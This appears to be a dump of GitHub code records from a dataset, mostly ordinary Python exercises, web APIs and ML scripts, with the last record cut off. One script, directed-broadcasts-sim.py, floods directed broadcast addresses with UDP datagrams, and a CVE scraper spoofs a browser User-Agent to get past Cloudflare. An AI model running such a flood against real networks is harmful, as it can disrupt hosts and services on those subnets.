+{"seq_id":"19097445842","text":"def permutations(string):\n    import math\n    import random\n    from collections import Counter\n    rList = []\n    sList = list(string)\n\n    # number of distinct permutations of a multiset: n! / product(count!);\n    # the original ad-hoc formula under-counted for inputs like 'aaab' and\n    # could make the loop below spin forever\n    expectedLength = math.factorial(len(string))\n    for count in Counter(string).values():\n        expectedLength //= math.factorial(count)\n\n    while len(rList) < expectedLength:\n        # keep shuffling until every distinct permutation has been seen\n        random.shuffle(sList)\n        s = ''.join(sList)\n        if s not in rList:\n            rList.append(s)\n\n    return rList\n\npermutations('a')\npermutations('ab')\npermutations('aabb')","repo_name":"DiogenesOfMiami/CodeWars","sub_path":"permutations2.py","file_name":"permutations2.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
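Rejection-sampling permutations, as above, works but is slow; the standard library enumerates them directly, and set() collapses the duplicates produced by repeated letters:

from itertools import permutations

distinct = sorted(set(''.join(p) for p in permutations('aabb')))
print(distinct)            # ['aabb', 'abab', 'abba', 'baab', 'baba', 'bbaa']
print(len(distinct) == 6)  # 4! / (2! * 2!) = 6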
+{"seq_id":"25898040227","text":"from pymongo import MongoClient\nimport time\nfrom flask_login import current_user\nif __name__ != '__main__':\n    from app import app\nimport bson\nfrom errorCodes import *\nclass Books:\n\n    def __init__(self):\n        app.config['authorsDB'] = 'authors'\n        app.config['booksDB'] = 'books'\n        self.db = MongoClient(app.config['MONGO_URI'])\n        self.books = self.db[app.config['booksDB']][app.config['booksDB']]\n        self.authors = self.db[app.config['authorsDB']][app.config['authorsDB']]\n\n    def insertBook(self, data):\n        authors = data[\"authorNames\"].split(\",\")\n        userId = current_user.userId['userId']\n        # note: when several authors are given, each is created, but only the\n        # last one ends up on the book document built below\n        for authorName in authors:\n            author = Author(self.authors, authorName)\n            author.insert_author()\n            structure = {\"bookName\": data['bookName'],\n                         \"authorName\": author.authorName,\n                         \"authorId\": author.authorId,\n                         \"MRP\": data['MRP'],\n                         \"rental\": data['rental'],\n                         \"securityDeposit\": data['securityDeposit'],\n                         \"timePeriod\": data[\"timePeriod\"],\n                         \"qtyAvailable\": data['qtyAvailable'],\n                         \"seller\": userId,\n                         \"otherdata\": data['otherDetails'],  # Book_Images, description, any other message for user\n                         \"timestamp\": time.time()\n                         }\n        self.books.insert_one(structure)\n        del structure['authorId']\n        del structure['authorName']\n        structure['bookId'] = str(structure['_id'])\n        author.insertBooksInAuthor(structure['_id'])\n        del structure['_id']\n        print(structure)\n        return structure\n\n    # def find\n\n\nclass Author:\n\n    def __init__(self, authorDB, authorName=None, authorId=None):\n        self.authorDB = authorDB\n        # only match on _id when one was actually given; bson.ObjectId(None)\n        # silently generates a brand-new id that matches nothing\n        query = {\"AUTHOR_NAME\": authorName}\n        if authorId is not None:\n            query = {\"$or\": [query, {\"_id\": bson.ObjectId(authorId)}]}\n        result = self.authorDB.find_one(query)\n        if result:\n            self.exist = True\n            self.authorId = result['_id']\n            self.authorName = result['AUTHOR_NAME']\n            self.books = result['books']\n        else:\n            self.exist = False\n            self.authorId = None\n            self.authorName = authorName\n            self.books = []\n\n    def existing(self):\n        return self.exist\n\n    def insert_author(self):\n        if (not self.exist) and isinstance(self.authorName, str):\n            structure = {\"AUTHOR_NAME\": self.authorName, \"books\": self.books}\n            # insert() is deprecated in pymongo; insert_one also fills in _id\n            self.authorDB.insert_one(structure)\n            self.authorId = structure['_id']\n            self.exist = True\n        else:\n            return E24 if self.exist else E15\n\n    def insertBooksInAuthor(self, bookId):\n        if not self.exist:\n            self.insert_author()\n        self.authorDB.find_one_and_update({\"_id\": self.authorId},\n                                          {\"$push\":\n                                           {\"books\": {\n                                               \"$each\": [str(bookId)]\n                                           }\n                                           }\n                                          })\n","repo_name":"leetanshaj/booksAPI","sub_path":"books.py","file_name":"books.py","file_ext":"py","file_size_in_byte":3138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
+{"seq_id":"30099007846","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\n\r\n\r\n# a browser User-Agent is sent because requests with the default one were blocked by Cloudflare's protection\r\nheaders = {\r\n    \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\"\r\n}\r\n\r\nurl = \"https://www.cvedetails.com/vulnerabilities-by-types.php\"\r\nreq = requests.get(url, headers=headers, verify=True)\r\nsoup = BeautifulSoup(req.text, 'html.parser')\r\n\r\n# all 'table' tags inside the 'body' tag\r\ntables = soup.body.find_all('table')\r\n# pick the first table\r\ntable = tables[0]\r\n# every tr tag in the table\r\nrows = table.find_all('tr')\r\n\r\ndata = {}\r\nfor row in rows:\r\n    th = row.find('th')\r\n    a = th.find('a') if th else None\r\n    if a:\r\n        year = a.text.strip()\r\n        # if the extracted text is '2023',\r\n        if year == '2023':\r\n            tds = row.find_all('td')\r\n            for td in tds:\r\n                a = td.find('a')\r\n                if a:\r\n                    # add an entry with the 'a' tag's 'title' attribute as key and its text as value\r\n                    key = a.get('title').replace(' vulnerabilities for 2023', '')  # strip the ' vulnerabilities for 2023' suffix\r\n                    value = a.text.strip()\r\n                    data[key] = value\r\n\r\nprint(data)\r\n\r\n# # iterate over each row\r\n# for row in rows:\r\n#     # find the 'th' tag\r\n#     th = row.find('th')\r\n#     # find the 'a' tag inside the 'th' tag\r\n#     a = th.find('a') if th else None\r\n#     # if there is an 'a' tag,\r\n#     if a:\r\n#         # extract the 'a' tag's text\r\n#         year = a.text.strip()\r\n#         # if the extracted text is '2023',\r\n#         if year == '2023':\r\n#             # print the text of every 'td' tag in that row\r\n#             data = [td.text.strip() for td in row.find_all('td')]\r\n#             print(data)","repo_name":"gituserYun/PythonProject","sub_path":"Crowling/cve_scraping.py","file_name":"cve_scraping.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
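Row-by-row table scraping, as in the cve_scraping record, can often be collapsed with pandas — hedged: read_html needs lxml or html5lib installed, a well-formed table, and the same Cloudflare block noted above may still apply to this URL:

import pandas as pd

# read_html returns a list of DataFrames, one per <table> found on the page
tables = pd.read_html("https://www.cvedetails.com/vulnerabilities-by-types.php")
print(tables[0].head())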
+{"seq_id":"7450321632","text":"\"\"\"Select field.\"\"\"\nfrom collections.abc import Sequence\nfrom enum import Enum\nfrom typing import Any, List, Literal, Optional, Union\n\nimport attr\nfrom attrs import frozen, validators\nfrom oes.interview.config.field import AskField, FieldBase\nfrom oes.interview.parsing.location import Location\nfrom oes.template import Template\n\n\n@frozen\nclass Option:\n    \"\"\"A :class:`SelectField` option.\"\"\"\n\n    value: Any\n    label: Optional[Template] = None\n\n\nclass SelectComponentType(str, Enum):\n    dropdown = \"dropdown\"\n    checkbox = \"checkbox\"\n    radio = \"radio\"\n\n\n@frozen\nclass SelectAskField(AskField):\n    \"\"\"AskField for a select field.\"\"\"\n\n    type: Literal[\"select\"] = \"select\"\n    optional: bool = False\n    default: Optional[Union[int, Sequence[int]]] = None\n    label: Optional[str] = None\n\n    require_value: Optional[Union[int, Sequence[int]]] = None\n    require_value_message: Optional[str] = None\n\n    component: SelectComponentType = SelectComponentType.dropdown\n    \"\"\"The select component type.\"\"\"\n\n    min: int = 1\n    \"\"\"The minimum number of items.\"\"\"\n\n    max: int = 1\n    \"\"\"The maximum number of items.\"\"\"\n\n    options: Sequence[str] = ()\n    \"\"\"The list of options.\"\"\"\n\n    input_mode: Optional[str] = None\n    \"\"\"The HTML input mode for this field.\"\"\"\n\n    autocomplete: Optional[str] = None\n    \"\"\"The autocomplete type for this field's input.\"\"\"\n\n\n@frozen\nclass SelectField(FieldBase):\n    \"\"\"Select field.\"\"\"\n\n    type: Literal[\"select\"] = \"select\"\n    set: Optional[Location] = None\n    optional: bool = False\n    default: Optional[Union[int, Sequence[int]]] = None\n    label: Optional[Template] = None\n\n    require_value: Optional[Union[int, Sequence[int]]] = None\n    require_value_message: Optional[str] = None\n\n    min: int = 1\n    \"\"\"The minimum number of items.\"\"\"\n\n    max: int = 1\n    \"\"\"The maximum number of items.\"\"\"\n\n    component: SelectComponentType = SelectComponentType.dropdown\n    \"\"\"The select component type.\"\"\"\n\n    input_mode: Optional[str] = None\n    \"\"\"The HTML input mode for this field.\"\"\"\n\n    autocomplete: Optional[str] = None\n    \"\"\"The autocomplete type for this field's input.\"\"\"\n\n    options: list[Option] = []\n    \"\"\"The options.\"\"\"\n\n    def get_ask_field(self, context: dict[str, Any]) -> SelectAskField:\n        return SelectAskField(\n            type=self.type,\n            optional=self.optional,\n            default=self.default,\n            label=self.label.render(**context) if self.label else None,\n            min=self.min,\n            max=self.max,\n            component=self.component,\n            
input_mode=self.input_mode,\n autocomplete=self.autocomplete,\n options=tuple(\n opt.label.render(**context) if opt.label else str(opt.value)\n for opt in self.options\n ),\n require_value=self.require_value,\n require_value_message=self.require_value_message,\n )\n\n def get_python_type(self) -> object:\n if self.max == 1:\n if self.min == 0:\n return Optional[int]\n else:\n return int\n else:\n return List[int]\n\n def _validate_size(self, instance, attribute, value):\n if self.max == 1 and value is None and self.min == 1:\n raise ValueError(f\"{attribute.name}: A value is required\")\n\n if self.max > 1 and len(value) < self.min:\n raise ValueError(f\"{attribute.name}: At least {self.min} items required\")\n\n if self.max > 1 and len(value) > self.max:\n raise ValueError(f\"{attribute.name}: At most {self.max} items required\")\n\n def _validate_required_value(self, i, a, v):\n # values/shape should already have been validated\n if self.require_value is not None and v is not None:\n expected = (\n self._transform_option_list(sorted(self.require_value))\n if isinstance(self.require_value, (list, tuple, set, frozenset))\n else self._transform_single_option(self.require_value)\n )\n given = v\n if expected != given:\n raise ValueError(\n f\"{a.name}: {self.require_value_message or 'Required'}\"\n )\n\n def get_field_info(self) -> Any:\n return attr.ib(\n type=self.get_python_type(),\n converter=self.transform_options,\n validator=[\n validators.optional(\n [\n self._validate_size,\n self._validate_required_value,\n ]\n )\n ],\n )\n\n def option_to_value(self, option: Any) -> Any:\n \"\"\"Get an option value by its index.\"\"\"\n if not isinstance(option, int):\n raise ValueError(f\"Not a valid option: {option}\")\n\n try:\n option_entry = self.options[option]\n except IndexError:\n raise ValueError(f\"Not a valid option: {option}\")\n\n return option_entry.value\n\n def _transform_single_option(self, value: Any) -> Any:\n if value is None:\n return None\n else:\n return self.option_to_value(value)\n\n def _transform_option_list(self, value: Any) -> Any:\n if isinstance(value, (list, tuple)):\n # sort values for consistent comparison\n transformed = [self.option_to_value(v) for v in sorted(value)]\n number_set = set(value)\n if len(number_set) != len(transformed):\n raise ValueError(\"Duplicate values not allowed\")\n\n return transformed\n else:\n raise ValueError(\"Not a list\")\n\n def transform_options(self, value: Any) -> Any:\n if self.max == 1:\n return self._transform_single_option(value)\n else:\n return self._transform_option_list(value)\n","repo_name":"Open-Event-Systems/interview","sub_path":"python/src/oes/interview/config/fields/select.py","file_name":"select.py","file_ext":"py","file_size_in_byte":5853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6038606903","text":"class Solution:\n def findRelativeRanks(self, score: List[int]) -> List[str]:\n transform = sorted(score, reverse=True)\n my_dict = {}\n for idx, val in enumerate(transform):\n if idx == 0:\n my_dict[val] = \"Gold Medal\"\n elif idx == 1:\n my_dict[val] = \"Silver Medal\"\n elif idx == 2:\n my_dict[val] = \"Bronze Medal\"\n else:\n my_dict[val] = str(idx+1)\n \n out = []\n for i in score:\n out.append(my_dict[i])\n \n return 
out","repo_name":"rockett-m/LeetCode","sub_path":"0506-relative-ranks/0506-relative-ranks.py","file_name":"0506-relative-ranks.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"7427989213","text":"import tensorflow as tf\nimport numpy as np\nimport os\nimport math\nfrom datetime import datetime\nfrom functools import partial\n\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets(\"/tmp/data/\")\n\nn_inputs = 28 * 28\nn_hidden1 = 300\nn_hidden2 = 100\nn_outputs = 10\n\nif 'session' in locals() and session is not None:\n    print('Close interactive session')\n    session.close()\n\ntf.reset_default_graph()\n\nX = tf.placeholder(tf.float32, shape=(None, n_inputs), name='X')\ny = tf.placeholder(tf.int32, shape=None, name='y')\ntraining = tf.placeholder_with_default(False, shape=(), name='training')\n\nbatch_norm_momentum = 0.9\n\nwith tf.name_scope('dnn'):\n    he_init = tf.contrib.layers.variance_scaling_initializer()\n\n    my_batch_norm_layer = partial(\n        tf.layers.batch_normalization,\n        training=training,\n        momentum=batch_norm_momentum\n    )\n\n    my_dense_layer = partial(\n        tf.layers.dense,\n        kernel_initializer=he_init\n    )\n\n    hidden1 = my_dense_layer(X, n_hidden1, name='hidden1')\n    bn1 = tf.nn.elu(my_batch_norm_layer(hidden1))\n    hidden2 = my_dense_layer(bn1, n_hidden2, name='hidden2')\n    bn2 = tf.nn.elu(my_batch_norm_layer(hidden2))\n    logits_before_bn = my_dense_layer(bn2, n_outputs, name='outputs')\n    logits = my_batch_norm_layer(logits_before_bn)\n\nwith tf.name_scope('loss'):\n    xentropy = tf.nn.sparse_softmax_cross_entropy_with_logits(\n        labels=y, logits=logits)\n    loss = tf.reduce_mean(xentropy, name='loss')\n    loss_summary = tf.summary.scalar('log_loss', loss)\n\n\nlearning_rate = 0.01\nwith tf.name_scope('train'):\n    optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)\n    training_op = optimizer.minimize(loss)\n\nwith tf.name_scope('eval'):\n    correct = tf.nn.in_top_k(logits, y, 1)\n    accuracy = tf.reduce_mean(tf.cast(correct, tf.float32))\n    accuracy_summary = tf.summary.scalar('accuracy', accuracy)\n\ninit = tf.global_variables_initializer()\nsaver = tf.train.Saver()\n\n\ndef log_dir(prefix=''):\n    now = datetime.utcnow().strftime('%Y%m%d%H%M%S')\n    root_logdir = './tf_logs'\n    if prefix:\n        prefix += '-'\n    name = prefix + 'run-' + now\n    return '{}/{}/'.format(root_logdir, name)\n\n\nlogdir = log_dir('mnist_selu')\n\nfile_writer = tf.summary.FileWriter(logdir, tf.get_default_graph())\n\nX_valid = mnist.validation.images\ny_valid = mnist.validation.labels\n\nX_train = mnist.train.images\nX_test = mnist.test.images\ny_test = mnist.test.labels\nm, n = X_train.shape\n\ncheckpoint_path = '/home/light/tmp/my_deep_batch_norm_mnist.ckpt'\ncheckpoint_epoch_path = checkpoint_path + '.epoch'\nfinal_model_path = './my_deep_batch_norm_mnist'\n\nbest_loss = np.infty\nepochs_without_progress = 0\nmax_epoch_without_progress = 50\n\nn_epochs = 10001\nbatch_size = 50\nn_batches = int(np.ceil(m / batch_size))\n\nextra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n\nwith tf.Session() as sess:\n    if os.path.isfile(checkpoint_epoch_path):\n        with open(checkpoint_epoch_path, 'rb') as f:\n            start_epoch = int(f.read())\n        print('Training was interrupted at :', start_epoch)\n        saver.restore(sess, checkpoint_path)\n    else:\n        start_epoch = 0\n        sess.run(init)\n\n    for epoch in range(start_epoch, n_epochs):\n        for iteration in range(mnist.train.num_examples // 
batch_size):\n                X_batch, y_batch = mnist.train.next_batch(batch_size)\n                sess.run([training_op, extra_update_ops],\n                         feed_dict={X: X_batch, y: y_batch})\n\n            accuracy_val, loss_val, accuracy_summary_str, loss_summary_str = sess.run(\n                [accuracy, loss, accuracy_summary, loss_summary], feed_dict={X: X_valid, y: y_valid})\n            file_writer.add_summary(accuracy_summary_str, epoch)\n            file_writer.add_summary(loss_summary_str, epoch)\n\n            if epoch % 5 == 0:\n                print('epoch', epoch,\n                      '\\tValidation Accuracy {:.3f}'.format(accuracy_val * 100),\n                      '\\t Loss {:.5f}'.format(loss_val))\n                saver.save(sess, checkpoint_path)\n                with open(checkpoint_epoch_path, 'wb') as f:\n                    f.write(b'%d' % (epoch + 1))\n                if loss_val < best_loss:\n                    saver.save(sess, final_model_path)\n                    best_loss = loss_val\n                else:\n                    epochs_without_progress += 5\n                    if epochs_without_progress > max_epoch_without_progress:\n                        print('early stopping at ', epoch)\n                        break\n\nos.remove(checkpoint_epoch_path)\n\nwith tf.Session() as sess:\n    saver.restore(sess, final_model_path)\n    accuracy_val = accuracy.eval(feed_dict={X: X_test, y: y_test})\n\naccuracy_val\n","repo_name":"machinedipto/machine_learning_projects","sub_path":"TensorFlow_examples/Batch_normalization.py","file_name":"Batch_normalization.py","file_ext":"py","file_size_in_byte":4672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"41691175569","text":"# BOJ_3613 : Java vs C++\r\nimport sys\r\n\r\n\r\ndef convert_type(string):\r\n    pre_letter = string[0]\r\n    if pre_letter.isupper() or pre_letter == \"_\" or string[-1] == \"_\":\r\n        return 'Error!'\r\n\r\n    snake_case, camelCase = False, False\r\n    res_string = pre_letter\r\n    for letter in string[1:]:\r\n        # check which naming style is used\r\n        if not snake_case and letter == '_':\r\n            snake_case = True\r\n        if not camelCase and letter.isupper():\r\n            camelCase = True\r\n        if snake_case and camelCase:\r\n            return 'Error!'\r\n\r\n        # convert the name\r\n        if pre_letter.isalpha() and letter == '_':\r\n            pre_letter = letter\r\n            continue\r\n        elif pre_letter == '_' and letter == '_':\r\n            return 'Error!'\r\n        elif pre_letter == '_' and letter.islower():\r\n            res_string += letter.upper()\r\n        elif letter.isupper():\r\n            res_string += '_' + letter.lower()\r\n        else:\r\n            res_string += letter\r\n\r\n        pre_letter = letter\r\n\r\n    return res_string\r\n\r\n\r\nname = list(str(sys.stdin.readline().rstrip()))\r\nconverted_name = convert_type(name)\r\n\r\nprint(converted_name)","repo_name":"Dachaes/BaekJoon","sub_path":"백준/Silver/3613. 
Java vs C++/Java vs C++.py","file_name":"Java vs C++.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23525210056","text":"import sys\r\n\r\nINPUT = sys.stdin.readline\r\n\r\n\r\ndef fibonacci(n: int):\r\n if n < 2:\r\n return n\r\n\r\n prev, curr = 0, 1\r\n for _ in range(n - 1):\r\n tmp = curr\r\n curr += prev\r\n prev = tmp\r\n return curr\r\n\r\n\r\nif __name__ == \"__main__\":\r\n n = int(INPUT())\r\n print(fibonacci(n))\r\n","repo_name":"Kdelphinus/Python_study","sub_path":"Baekjoon/bronze/bronze II/2747_fibonacci_number.py","file_name":"2747_fibonacci_number.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"26628730428","text":"import sys, math\n\n\ninput = sys.stdin.readline\n\n\nT = int(input())\nfor _ in range(T) :\n H, W, N = map(int, input().split(' '))\n floor = N % H\n if (floor == 0) : floor = H\n room = math.ceil(N / H)\n if (room > 9) : print(str(floor) + str(room))\n else : print(str(floor) + '0' + str(room))","repo_name":"Marshal1101/Algorithm_BOJ_CLASS_1-5","sub_path":"CLASS_2++/003-10250-ACM호텔.py","file_name":"003-10250-ACM호텔.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32720509812","text":"class Cliente:\n def __init__(self, id, nome, cpf):\n self._id = id\n self._nome = nome\n self._cpf = cpf\n \n def imprimirCliente(self):\n\n print(f'''\n ID - {self._id}\n Nome - {self._nome}\n CPF - {self._cpf}\n ''')\n\n def consultarClientePorID(self):\n sql = f'''\n SELECT * FROM \"Cliente\"\n WHERE \"ID\" = '{self._id}'\n '''\n return sql\n\n def consultarAlugueis(self):\n sql = f'''\n SELECT * FROM \"Aluguel\"\n WHERE \"ID_Cliente\" = '{self._id}'\n '''\n return sql\n\n def inserirCliente(self):\n sql = f'''\n INSERT INTO \"Cliente\"\n VALUES(default, '{self._nome}', '{self._cpf}')\n \n '''\n\n return sql","repo_name":"TarikPonciano/Programador-de-Sistema-SENAC","sub_path":"Programador de Sistemas - UC 2/Repositório de Exemplos - Turma 1/Aula 06-02/Biblioteca/Modelo/classCliente.py","file_name":"classCliente.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"pt","doc_type":"code","stars":5,"dataset":"github-code","pt":"34"} +{"seq_id":"11052538254","text":"import numpy as np\n\ndef find_sigma(mtr,gamma=0.005):\n n_row,n_col = mtr.shape\n res = np.infty\n for i in range(n_row-1):\n for j in range(i+1,n_row):\n tp = min(-np.sum((mtr[i,:]-mtr[j,:])**2)/np.log(gamma),res)\n if tp !=0:\n res = tp\n return res\n\n","repo_name":"yalechang/multiview","sub_path":"utils/else_affinity_sigma.py","file_name":"else_affinity_sigma.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"616502932","text":"#!/usr/bin/python\n\"\"\" Send Directed Broadcasts, for example simulate EPICS traffic\n\nThis script sends some udp datagrams as directed broadcasts - use on your own risk\n\"\"\"\n\n__author__ = \"dumplab\"\n__copyright__ = \"2014 dumplab\"\n__license__ = \"MIT\"\n__version__ = \"1.0\"\n__status__ = \"Development\"\n\nimport multiprocessing\nimport socket\n\n# define broadcast addresses\nbcAddress = [\"172.16.0.255\",\"172.16.8.255\",\"172.16.40.255\"]\t# addresses, note router MUST be enabled to forward as l2 broadcasts \"ip 
directed-broadcast\"\nbcPort = 5064\t\t\t\t\t\t# udp destination port to use\nbcCount = 4096\t\t\t\t\t\t# datagrams we shall send\n\ndef udpFlood(myAddress):\n\t\"\"\"Send UDP datagram at fastest rate\"\"\"\n\tb = multiprocessing.current_process()\n\tprint(\"Sending \" + str(bcCount) + \" UDP message(s) to \" + str(myAddress) + \":\" + str(bcPort) + \" PID(\" + str(b.pid) + \")\")\n\t# create socket\n\tsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\n\tfor x in range(bcCount):\n\t\t# payload must be bytes on Python 3\n\t\tsock.sendto(b\"its-not-the-network\", (myAddress, bcPort))\n\nfor SVI in bcAddress:\n\t# Process.start() returns None, so keep the handle before starting\n\tp = multiprocessing.Process(target=udpFlood, args=(SVI,))\n\tp.start()\n\n","repo_name":"dumplab/gittest","sub_path":"directed-broadcasts-sim.py","file_name":"directed-broadcasts-sim.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"41763434261","text":"#!/usr/bin/env python\n\"\"\"\nIf no cache is found, will scrape the ProgrammingPraxis website.\n\nOtherwise will output details of a dojo task.\n\nIf passed in the argument 'refresh', the script will scrape the\nProgrammingPraxis website for new tasks.\n\"\"\"\nimport sys\nimport random\nimport json\nimport requests\nimport html2text\nfrom bs4 import BeautifulSoup\n\n\ndef scrape(tasks):\n    \"\"\"\n    Scrapes ProgrammingPraxis for tasks, parses them and, if they don't already\n    exist in the task list, adds them to it. At the end, saves the task list\n    as a JSON file.\n    \"\"\"\n    known_tasks = set([task['url'].lower().strip() for task in tasks])\n    target = 'http://programmingpraxis.com/page/{}/'\n    counter = 0\n    new_exercises = True\n    while new_exercises:\n        target_url = target.format(counter)\n        response = requests.get(target_url)\n        print('Grabbing URL: {}'.format(target_url))\n        if counter == 0:\n            # We get weird Wordpress errors for page 1. 
Go figure.\n            counter = 1\n        counter += 1\n        if response.ok:\n            soup = BeautifulSoup(response.text, 'html.parser')\n            exercises = soup.find_all('div', 'entry')\n            for exercise in exercises:\n                try:\n                    title = exercise.find('h2').text\n                    date = exercise.find('h3').text\n                    url = exercise.find('h2').find('a').attrs['href']\n                    h2t = html2text.HTML2Text()\n                    description = h2t.handle(exercise.find('div', 'entrybody').prettify())\n                except Exception as ex:\n                    continue  # Skip malformed HTML; otherwise stale values from a previous iteration would be reused below.\n                if url not in known_tasks:\n                    tasks.append({\n                        'url': url,\n                        'title': title,\n                        'date': date,\n                        'description': description,\n                    })\n                    known_tasks.add(url)\n                else:\n                    new_exercises = False\n                    break\n            print('Number of tasks scraped: {}'.format(len(tasks)))\n        else:\n            new_exercises = False\n            break\n    json.dump(tasks, open('tasks.json', 'w'), indent=2)\n\n\nif __name__ == '__main__':\n    refresh = False\n    if len(sys.argv) > 1 and sys.argv[1] == 'refresh':\n        refresh = True\n    tasks = []\n    try:\n        tasks = json.load(open('tasks.json'))\n    except:\n        refresh = True\n    if refresh:\n        scrape(tasks)\n    task = random.choice(tasks)\n    print(task['title'] + '\\n')\n    print(task['date'] + ' - ' + task['url'] + '\\n\\n')\n    print(task['description'])\n","repo_name":"ntoll/dojotaskgen","sub_path":"taskgen.py","file_name":"taskgen.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"44211366632","text":"\"\"\"\nTest end to end django views.\n\"\"\"\nimport json\n\nfrom django.urls import reverse\nimport pytest\n\n\npytestmark = [\n    pytest.mark.django_db,\n]\n\n\ndef test_index_view(client):\n    \"\"\"Verify the index view is as expected\"\"\"\n    response = client.get(reverse('main-index'))\n    assert response.status_code == 200\n    assert b\"Hi, I'm {{ cookiecutter.project_name }}\" in response.content\n\n\ndef test_webpack_url(mocker, settings, client):\n    \"\"\"Verify that webpack bundle src shows up in production\"\"\"\n    settings.GA_TRACKING_ID = 'fake'\n    settings.ENVIRONMENT = 'test'\n    settings.VERSION = '4.5.6'\n    settings.USE_WEBPACK_DEV_SERVER = False\n    get_bundle = mocker.patch('main.templatetags.render_bundle._get_bundle')\n\n    response = client.get(reverse('main-index'))\n\n    bundles = [bundle[0][1] for bundle in get_bundle.call_args_list]\n    assert set(bundles) == {\n        'root',\n        'style',\n    }\n    js_settings = json.loads(response.context['js_settings_json'])\n    assert js_settings == {\n        'gaTrackingID': 'fake',\n        'public_path': '/static/bundles/',\n        'environment': settings.ENVIRONMENT,\n        'sentry_dsn': \"\",\n        'release_version': settings.VERSION,\n    }\n","repo_name":"mitodl/cookiecutter-djangoapp","sub_path":"{{ cookiecutter.project_name }}/main/views_test.py","file_name":"views_test.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"}
{"seq_id":"6160488153","text":"from rest_framework import serializers\nfrom login.serializers import UserSerializerList\n\nfrom repetory.models import Repertory\n\nclass RepertorySerializer(serializers.ModelSerializer):\n    who_added = UserSerializerList()\n    class Meta:\n        model = Repertory\n        fields = [\n            'id',\n            'music_name',\n            'music_artist',\n            'music_album',\n            'music_genre',\n            'created_at',\n            'who_added',\n            
]\n","repo_name":"NickolasMuzzi/band-repetory","sub_path":"api/repetory/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"72423302177","text":"## code that merges train and test into a single file\nimport pandas as pd\n\n# the *_2.csv files are CSVs saved without blank lines\ndata = pd.read_csv(\"./mnist/train_2.csv\",header=None)\ntest = pd.read_csv(\"./mnist/t10k_2.csv\",header=None)\n\nall_data = []\nall_data.append(data)\nall_data.append(test)\ndata_concat = pd.concat(all_data)\ndata_concat.to_csv('./mnist/all_data.csv',index=False,header=False)","repo_name":"lululalamm/bigdata2019","sub_path":"03. AI/01. Machine Learning/all_data_mk.py","file_name":"all_data_mk.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"31857568531","text":"#!/usr/bin/env python3\n\nfrom cassis import *\n\nif __name__ == \"__main__\":\n\n    ts_file = open('TypeSystem.xml', 'rb')\n    type_system = load_typesystem(ts_file)\n\n    xmi_file = open('XmiSingleView/patientX_doc3_NOTE.txt.xmi', 'rb')\n    cas = load_cas_from_xmi(xmi_file, typesystem=type_system)\n\n    for sentence in cas.select('org.apache.ctakes.typesystem.type.textspan.Sentence'):\n        print('\\nsentence:', sentence.get_covered_text())\n\n        for token in cas.select_covered('org.apache.ctakes.typesystem.type.syntax.BaseToken', sentence):\n        # for token in cas.select_covered('org.apache.ctakes.typesystem.type.syntax.WordToken', sentence):\n            print('token:', token.get_covered_text())\n","repo_name":"dmitriydligach/Sandbox","sub_path":"Archive/PyCtakes/cas_single_view.py","file_name":"cas_single_view.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"27621232832","text":"import pyqtgraph as pg\nfrom pyqtgraph.Qt import QtCore\nfrom models.line import get_line_params\nfrom models.point import Point\nfrom widgets.edit_bound_target_item_widget import EditBoundTargetItemWidget\n\n\nclass BoundTargetItem(pg.TargetItem):\n    def __init__(\n            self,\n            curve: pg.PlotDataItem,\n            pos=None,\n            size=10,\n            symbol=\"crosshair\",\n            pen=None,\n            hoverPen=None,\n            brush=None,\n            hoverBrush=None,\n            movable=True,\n            label=None,\n            labelOpts=None,\n    ):\n        super().__init__(\n            pos, size, symbol, pen, hoverPen, brush, hoverBrush, movable, label, labelOpts\n        )\n\n        self.__curve = curve\n        self.__curve.sigPlotChanged.connect(self.update_pos)\n        self.__edit_bound_target_item_widget = EditBoundTargetItemWidget()\n        self.__metadata = \"\"\n        self.__ox_fixation = False\n\n        self.__edit_bound_target_item_widget.apply_signal.connect(self.__update_metadata)\n\n    def fix_on_ox(self):\n        self.__ox_fixation = True\n\n    def free_movement_on_ox(self):\n        self.__ox_fixation = False\n\n    def update_pos(self):\n        cp = 